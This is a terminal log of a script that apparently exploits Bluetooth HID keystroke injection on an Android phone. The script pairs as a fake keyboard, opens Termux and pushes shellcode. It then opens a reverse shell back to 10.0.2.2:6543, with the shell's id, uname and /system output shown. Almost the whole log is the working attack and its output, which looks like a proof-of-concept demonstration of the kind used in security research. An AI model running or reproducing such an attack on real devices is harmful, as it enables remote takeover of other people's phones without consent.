$ sudo ./run.sh 08:AE:D6:6F:DD:F8 10.0.2.2
[sudo] password for marshall:
[*] Building reverse shell for 10.0.2.2:6543
[*] Pairing to 08:AE:D6:6F:DD:F8
[!] Paired 08:AE:D6:6F:DD:F8 to DC:53:60:6C:FC:B3
[!] Go to another terminal and start a netcat listener on port to handle the shell!
[*] Registered HID profile
[!] Ready, waiting for connection from phone
[*] Control channel connected to 08:AE:D6:6F:DD:F8
[*] Interrupt channel connected to 08:AE:D6:6F:DD:F8
[!] Building shell...
[*] Trying to attain control over device...
[*] Sending back to home screen...
[*] Trying to pull up finder...
[*] Trying to find termux...
[*] Pushing shellcode now...
[!] Back that big ass up guuuuuurl!
listening on [any] 6543 ...
no connection : Connection timed out
[*] Connect timed out, trying again...
[!] Back that big ass up guuuuuurl!
listening on [any] 6543 ...
connect to [10.0.2.2] from nerkon [10.0.2.5] 33812
~ $ id; uname -a
id; uname -a
uid=10466(u0_a466) gid=10466(u0_a466) groups=10466(u0_a466),3003(inet),9997(everybody),20466(u0_a466_cache),50466(all_a466)
Linux localhost 4.4.153-17214672 #2 SMP PREEMPT Thu Oct 21 19:08:15 KST 2021 aarch64 Android
~ $ ls /system
ls /system
app bin build.prop cameradata carrier compatibility_matrix.xml container csc_contents embms etc fake-libs fake-libs64 fonts framework hidden info.extra lib lib64 lost+found media omc priv-app product recovery-from-boot.p saiv tima_measurement_info tts usr vendor voicebargeindata xbin
~ $ exit
exit
exit
[x] Exploit complete!